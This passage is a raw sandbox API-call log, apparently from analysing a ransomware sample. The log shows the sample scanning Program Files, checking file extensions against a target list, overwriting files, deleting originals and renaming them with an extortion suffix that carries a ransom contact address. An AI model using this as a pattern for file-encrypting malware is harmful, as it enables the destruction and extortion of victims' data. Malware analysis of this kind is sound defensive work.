lpBuffer=0x415e020*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0x375fc94, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesWritten=0x375fc94*=0xf6, lpOverlapped=0x0) returned 1 [0184.866] SetEndOfFile (hFile=0x398) returned 1 [0184.866] CloseHandle (hObject=0x398) returned 1 [0184.866] SetFilePointerEx (in: hFile=0x374, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec0 | out: lpNewFilePointer=0x0) returned 1 [0184.866] SetEndOfFile (hFile=0x374) returned 1 [0184.868] CloseHandle (hObject=0x374) returned 1 [0184.868] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOInstaller.exe.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0184.868] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOInstaller.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\vstoinstaller.exe")) returned 1 [0184.868] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOInstaller.exe") returned 74 [0184.868] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOInstaller.exe") returned 74 [0184.868] lstrlenW (lpString=".doc") returned 4 [0184.868] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0184.868] lstrlenW (lpString=".docx") returned 5 [0184.868] lstrcmpiW (lpString1=".docx", lpString2="r.exe") returned -1 [0184.868] lstrlenW (lpString=".pdf") returned 4 [0184.868] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0184.868] lstrlenW (lpString=".xls") returned 4 [0184.868] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0184.868] lstrlenW (lpString=".xlsx") returned 5 [0184.868] lstrcmpiW (lpString1=".xlsx", lpString2="r.exe") returned -1 [0184.868] lstrlenW (lpString=".ppt") returned 4 [0184.868] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0184.868] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOInstaller.exe") returned 74 [0184.868] lstrlenW (lpString=".zip") returned 4 [0184.868] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0184.868] lstrlenW (lpString=".rar") returned 4 [0184.868] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0184.869] lstrlenW (lpString=".bz2") returned 4 [0184.869] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0184.869] lstrlenW (lpString=".7z") returned 3 [0184.869] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0184.869] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOInstaller.exe") returned 74 [0184.869] lstrlenW (lpString=".dbf") returned 4 [0184.869] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0184.869] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOInstaller.exe") returned 74 [0184.869] lstrlenW (lpString=".1cd") returned 4 [0184.869] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0184.869] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOInstaller.exe") returned 74 [0184.869] lstrlenW (lpString=".jpg") returned 4 [0184.869] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0184.869] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOInstaller.exe") returned 74 [0184.869] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOInstaller.exe") returned 74 [0184.869] lstrlenW (lpString=".doc") returned 4 [0184.869] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0184.869] lstrlenW (lpString=".docx") returned 5 [0184.869] lstrcmpiW (lpString1=".docx", lpString2="r.exe") returned -1 [0184.869] lstrlenW (lpString=".pdf") returned 4 [0184.869] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0184.869] lstrlenW (lpString=".xls") returned 4 [0184.869] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0184.869] lstrlenW (lpString=".xlsx") returned 5 [0184.869] lstrcmpiW (lpString1=".xlsx", lpString2="r.exe") returned -1 [0184.869] lstrlenW (lpString=".ppt") returned 4 [0184.869] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0184.869] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOInstaller.exe") returned 74 [0184.869] lstrlenW (lpString=".zip") returned 4 [0184.869] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0184.869] lstrlenW (lpString=".rar") returned 4 [0184.869] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0184.869] lstrlenW (lpString=".bz2") returned 4 [0184.869] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0184.870] lstrlenW (lpString=".7z") returned 3 [0184.870] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0184.870] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOInstaller.exe") returned 74 [0184.870] lstrlenW (lpString=".dbf") returned 4 [0184.870] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0184.870] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOInstaller.exe") returned 74 [0184.870] lstrlenW (lpString=".1cd") returned 4 [0184.870] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0184.870] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOInstaller.exe") returned 74 [0184.870] lstrlenW (lpString=".jpg") returned 4 [0184.870] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0184.870] lstrcmpiW (lpString1=".mui", lpString2=".bat") returned 1 [0184.870] lstrlenW (lpString="oledb32r.dll.mui") returned 16 [0184.870] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\oledb32r.dll.mui" (normalized: "c:\\program files\\common files\\system\\ole db\\en-us\\oledb32r.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x374 [0184.871] GetFileSizeEx (in: hFile=0x374, lpFileSize=0x375ff14 | out: lpFileSize=0x375ff14*=48128) returned 1 [0184.871] CloseHandle (hObject=0x374) returned 1 [0184.871] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\oledb32r.dll.mui" (normalized: "c:\\program files\\common files\\system\\ole db\\en-us\\oledb32r.dll.mui")) returned 0x20 [0184.871] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\oledb32r.dll.mui.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\system\\ole db\\en-us\\oledb32r.dll.mui.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0184.871] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\oledb32r.dll.mui" (normalized: "c:\\program files\\common files\\system\\ole db\\en-us\\oledb32r.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0184.871] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\oledb32r.dll.mui") returned 66 [0184.871] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\oledb32r.dll.mui") returned 66 [0184.871] lstrlenW (lpString=".doc") returned 4 [0184.871] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0184.871] lstrlenW (lpString=".docx") returned 5 [0184.872] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0184.872] lstrlenW (lpString=".pdf") returned 4 [0184.872] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0184.872] lstrlenW (lpString=".xls") returned 4 [0184.872] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0184.872] lstrlenW (lpString=".xlsx") returned 5 [0184.872] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1 [0184.872] lstrlenW (lpString=".ppt") returned 4 [0184.872] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0184.872] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\oledb32r.dll.mui") returned 66 [0184.872] lstrlenW (lpString=".zip") returned 4 [0184.872] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0184.872] lstrlenW (lpString=".rar") returned 4 [0184.872] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0184.872] lstrlenW (lpString=".bz2") returned 4 [0184.872] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0184.872] lstrlenW (lpString=".7z") returned 3 [0184.872] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0184.872] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\oledb32r.dll.mui") returned 66 [0184.872] lstrlenW (lpString=".dbf") returned 4 [0184.872] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0184.872] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\oledb32r.dll.mui") returned 66 [0184.872] lstrlenW (lpString=".1cd") returned 4 [0184.872] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0184.872] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\oledb32r.dll.mui") returned 66 [0184.872] lstrlenW (lpString=".jpg") returned 4 [0184.872] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0184.872] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\oledb32r.dll.mui") returned 66 [0184.872] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\oledb32r.dll.mui") returned 66 [0184.873] lstrlenW (lpString=".doc") returned 4 [0184.873] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0184.873] lstrlenW (lpString=".docx") returned 5 [0184.873] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0184.873] lstrlenW (lpString=".pdf") returned 4 [0184.873] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0184.873] lstrlenW (lpString=".xls") returned 4 [0184.873] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0184.873] lstrlenW (lpString=".xlsx") returned 5 [0184.873] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1 [0184.873] lstrlenW (lpString=".ppt") returned 4 [0184.873] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0184.873] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\oledb32r.dll.mui") returned 66 [0184.873] lstrlenW (lpString=".zip") returned 4 [0184.873] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0184.873] lstrlenW (lpString=".rar") returned 4 [0184.873] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0184.873] lstrlenW (lpString=".bz2") returned 4 [0184.873] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0184.873] lstrlenW (lpString=".7z") returned 3 [0184.873] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0184.873] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\oledb32r.dll.mui") returned 66 [0184.873] lstrlenW (lpString=".dbf") returned 4 [0184.873] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0184.873] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\oledb32r.dll.mui") returned 66 [0184.873] lstrlenW (lpString=".1cd") returned 4 [0184.873] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0184.873] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\oledb32r.dll.mui") returned 66 [0184.873] lstrlenW (lpString=".jpg") returned 4 [0184.873] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0184.874] lstrcmpiW (lpString1=".mui", lpString2=".bat") returned 1 [0184.874] lstrlenW (lpString="sqloledb.rll.mui") returned 16 [0184.874] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\sqloledb.rll.mui" (normalized: "c:\\program files\\common files\\system\\ole db\\en-us\\sqloledb.rll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x374 [0184.876] GetFileSizeEx (in: hFile=0x374, lpFileSize=0x375ff14 | out: lpFileSize=0x375ff14*=44032) returned 1 [0184.876] CloseHandle (hObject=0x374) returned 1 [0184.876] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\sqloledb.rll.mui" (normalized: "c:\\program files\\common files\\system\\ole db\\en-us\\sqloledb.rll.mui")) returned 0x20 [0184.876] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\sqloledb.rll.mui.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\system\\ole db\\en-us\\sqloledb.rll.mui.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0184.876] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\sqloledb.rll.mui" (normalized: "c:\\program files\\common files\\system\\ole db\\en-us\\sqloledb.rll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0184.876] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\sqloledb.rll.mui") returned 66 [0184.876] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\sqloledb.rll.mui") returned 66 [0184.876] lstrlenW (lpString=".doc") returned 4 [0184.876] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0184.876] lstrlenW (lpString=".docx") returned 5 [0184.876] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0184.876] lstrlenW (lpString=".pdf") returned 4 [0184.876] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0184.877] lstrlenW (lpString=".xls") returned 4 [0184.877] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0184.877] lstrlenW (lpString=".xlsx") returned 5 [0184.877] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1 [0184.877] lstrlenW (lpString=".ppt") returned 4 [0184.877] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0184.877] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\sqloledb.rll.mui") returned 66 [0184.877] lstrlenW (lpString=".zip") returned 4 [0184.877] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0184.877] lstrlenW (lpString=".rar") returned 4 [0184.877] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0184.877] lstrlenW (lpString=".bz2") returned 4 [0184.877] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0184.877] lstrlenW (lpString=".7z") returned 3 [0184.877] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0184.877] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\sqloledb.rll.mui") returned 66 [0184.877] lstrlenW (lpString=".dbf") returned 4 [0184.877] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0184.877] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\sqloledb.rll.mui") returned 66 [0184.877] lstrlenW (lpString=".1cd") returned 4 [0184.877] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0184.877] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\sqloledb.rll.mui") returned 66 [0184.877] lstrlenW (lpString=".jpg") returned 4 [0184.877] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0184.877] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\sqloledb.rll.mui") returned 66 [0184.877] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\sqloledb.rll.mui") returned 66 [0184.877] lstrlenW (lpString=".doc") returned 4 [0184.877] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0184.877] lstrlenW (lpString=".docx") returned 5 [0184.877] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0184.877] lstrlenW (lpString=".pdf") returned 4 [0184.877] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0184.877] lstrlenW (lpString=".xls") returned 4 [0184.877] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0184.877] lstrlenW (lpString=".xlsx") returned 5 [0184.878] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1 [0184.878] lstrlenW (lpString=".ppt") returned 4 [0184.878] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0184.878] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\sqloledb.rll.mui") returned 66 [0184.878] lstrlenW (lpString=".zip") returned 4 [0184.878] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0184.878] lstrlenW (lpString=".rar") returned 4 [0184.878] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0184.878] lstrlenW (lpString=".bz2") returned 4 [0184.878] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0184.878] lstrlenW (lpString=".7z") returned 3 [0184.878] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0184.878] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\sqloledb.rll.mui") returned 66 [0184.878] lstrlenW (lpString=".dbf") returned 4 [0184.878] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0184.878] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\sqloledb.rll.mui") returned 66 [0184.878] lstrlenW (lpString=".1cd") returned 4 [0184.878] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0184.878] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\sqloledb.rll.mui") returned 66 [0184.878] lstrlenW (lpString=".jpg") returned 4 [0184.878] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0184.878] lstrcmpiW (lpString1=".mui", lpString2=".bat") returned 1 [0184.878] lstrlenW (lpString="sqlxmlx.rll.mui") returned 15 [0184.878] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\sqlxmlx.rll.mui" (normalized: "c:\\program files\\common files\\system\\ole db\\en-us\\sqlxmlx.rll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x374 [0184.879] GetFileSizeEx (in: hFile=0x374, lpFileSize=0x375ff14 | out: lpFileSize=0x375ff14*=18432) returned 1 [0184.879] CloseHandle (hObject=0x374) returned 1 [0184.880] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\sqlxmlx.rll.mui" (normalized: "c:\\program files\\common files\\system\\ole db\\en-us\\sqlxmlx.rll.mui")) returned 0x20 [0184.880] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\sqlxmlx.rll.mui.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\system\\ole db\\en-us\\sqlxmlx.rll.mui.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0184.881] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\sqlxmlx.rll.mui" (normalized: "c:\\program files\\common files\\system\\ole db\\en-us\\sqlxmlx.rll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0184.881] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\sqlxmlx.rll.mui") returned 65 [0184.881] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\sqlxmlx.rll.mui") returned 65 [0184.881] lstrlenW (lpString=".doc") returned 4 [0184.881] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0184.881] lstrlenW (lpString=".docx") returned 5 [0184.881] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0184.881] lstrlenW (lpString=".pdf") returned 4 [0184.881] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0184.881] lstrlenW (lpString=".xls") returned 4 [0184.881] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0184.881] lstrlenW (lpString=".xlsx") returned 5 [0184.881] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1 [0184.881] lstrlenW (lpString=".ppt") returned 4 [0184.881] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0184.881] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\sqlxmlx.rll.mui") returned 65 [0184.881] lstrlenW (lpString=".zip") returned 4 [0184.881] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0184.881] lstrlenW (lpString=".rar") returned 4 [0184.881] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0184.881] lstrlenW (lpString=".bz2") returned 4 [0184.881] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0184.881] lstrlenW (lpString=".7z") returned 3 [0184.881] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0184.881] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\sqlxmlx.rll.mui") returned 65 [0184.881] lstrlenW (lpString=".dbf") returned 4 [0184.881] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0184.881] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\sqlxmlx.rll.mui") returned 65 [0184.881] lstrlenW (lpString=".1cd") returned 4 [0184.881] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0184.882] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\sqlxmlx.rll.mui") returned 65 [0184.882] lstrlenW (lpString=".jpg") returned 4 [0184.882] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0184.882] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\sqlxmlx.rll.mui") returned 65 [0184.882] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\sqlxmlx.rll.mui") returned 65 [0184.882] lstrlenW (lpString=".doc") returned 4 [0184.882] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0184.882] lstrlenW (lpString=".docx") returned 5 [0184.882] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0184.882] lstrlenW (lpString=".pdf") returned 4 [0184.882] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0184.882] lstrlenW (lpString=".xls") returned 4 [0184.882] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0184.882] lstrlenW (lpString=".xlsx") returned 5 [0184.882] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1 [0184.882] lstrlenW (lpString=".ppt") returned 4 [0184.882] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0184.882] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\sqlxmlx.rll.mui") returned 65 [0184.882] lstrlenW (lpString=".zip") returned 4 [0184.882] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0184.882] lstrlenW (lpString=".rar") returned 4 [0184.882] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0184.882] lstrlenW (lpString=".bz2") returned 4 [0184.882] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0184.882] lstrlenW (lpString=".7z") returned 3 [0184.882] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0184.882] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\sqlxmlx.rll.mui") returned 65 [0184.882] lstrlenW (lpString=".dbf") returned 4 [0184.882] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0184.882] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\sqlxmlx.rll.mui") returned 65 [0184.882] lstrlenW (lpString=".1cd") returned 4 [0184.882] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0184.882] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\sqlxmlx.rll.mui") returned 65 [0184.883] lstrlenW (lpString=".jpg") returned 4 [0184.883] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0184.883] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0184.883] lstrlenW (lpString="msdaosp.dll") returned 11 [0184.883] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\msdaosp.dll" (normalized: "c:\\program files\\common files\\system\\ole db\\msdaosp.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x374 [0184.883] GetFileSizeEx (in: hFile=0x374, lpFileSize=0x375ff14 | out: lpFileSize=0x375ff14*=99840) returned 1 [0184.883] CloseHandle (hObject=0x374) returned 1 [0184.883] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\msdaosp.dll" (normalized: "c:\\program files\\common files\\system\\ole db\\msdaosp.dll")) returned 0x20 [0184.884] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\msdaosp.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\system\\ole db\\msdaosp.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0184.884] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\msdaosp.dll" (normalized: "c:\\program files\\common files\\system\\ole db\\msdaosp.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0184.884] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\msdaosp.dll") returned 55 [0184.884] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\msdaosp.dll") returned 55 [0184.884] lstrlenW (lpString=".doc") returned 4 [0184.884] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0184.884] lstrlenW (lpString=".docx") returned 5 [0184.884] lstrcmpiW (lpString1=".docx", lpString2="p.dll") returned -1 [0184.884] lstrlenW (lpString=".pdf") returned 4 [0184.884] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0184.884] lstrlenW (lpString=".xls") returned 4 [0184.884] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0184.884] lstrlenW (lpString=".xlsx") returned 5 [0184.884] lstrcmpiW (lpString1=".xlsx", lpString2="p.dll") returned -1 [0184.884] lstrlenW (lpString=".ppt") returned 4 [0184.884] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0184.884] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\msdaosp.dll") returned 55 [0184.884] lstrlenW (lpString=".zip") returned 4 [0184.884] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0184.884] lstrlenW (lpString=".rar") returned 4 [0184.884] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0184.884] lstrlenW (lpString=".bz2") returned 4 [0184.884] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0184.884] lstrlenW (lpString=".7z") returned 3 [0184.884] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0184.884] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\msdaosp.dll") returned 55 [0184.884] lstrlenW (lpString=".dbf") returned 4 [0184.884] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0184.884] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\msdaosp.dll") returned 55 [0184.884] lstrlenW (lpString=".1cd") returned 4 [0184.884] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0184.884] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole 